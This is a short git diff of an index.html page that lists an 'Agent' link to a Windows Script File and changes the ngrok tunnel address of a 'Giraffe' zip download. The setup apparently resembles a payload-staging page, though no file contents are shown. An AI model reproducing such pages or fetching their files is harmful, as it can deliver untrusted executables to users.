--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://04fd-109-252-42-180.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
+<a href="https://b6e1-2a00-1370-817a-34f-65e1-172a-db97-1c88.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
     
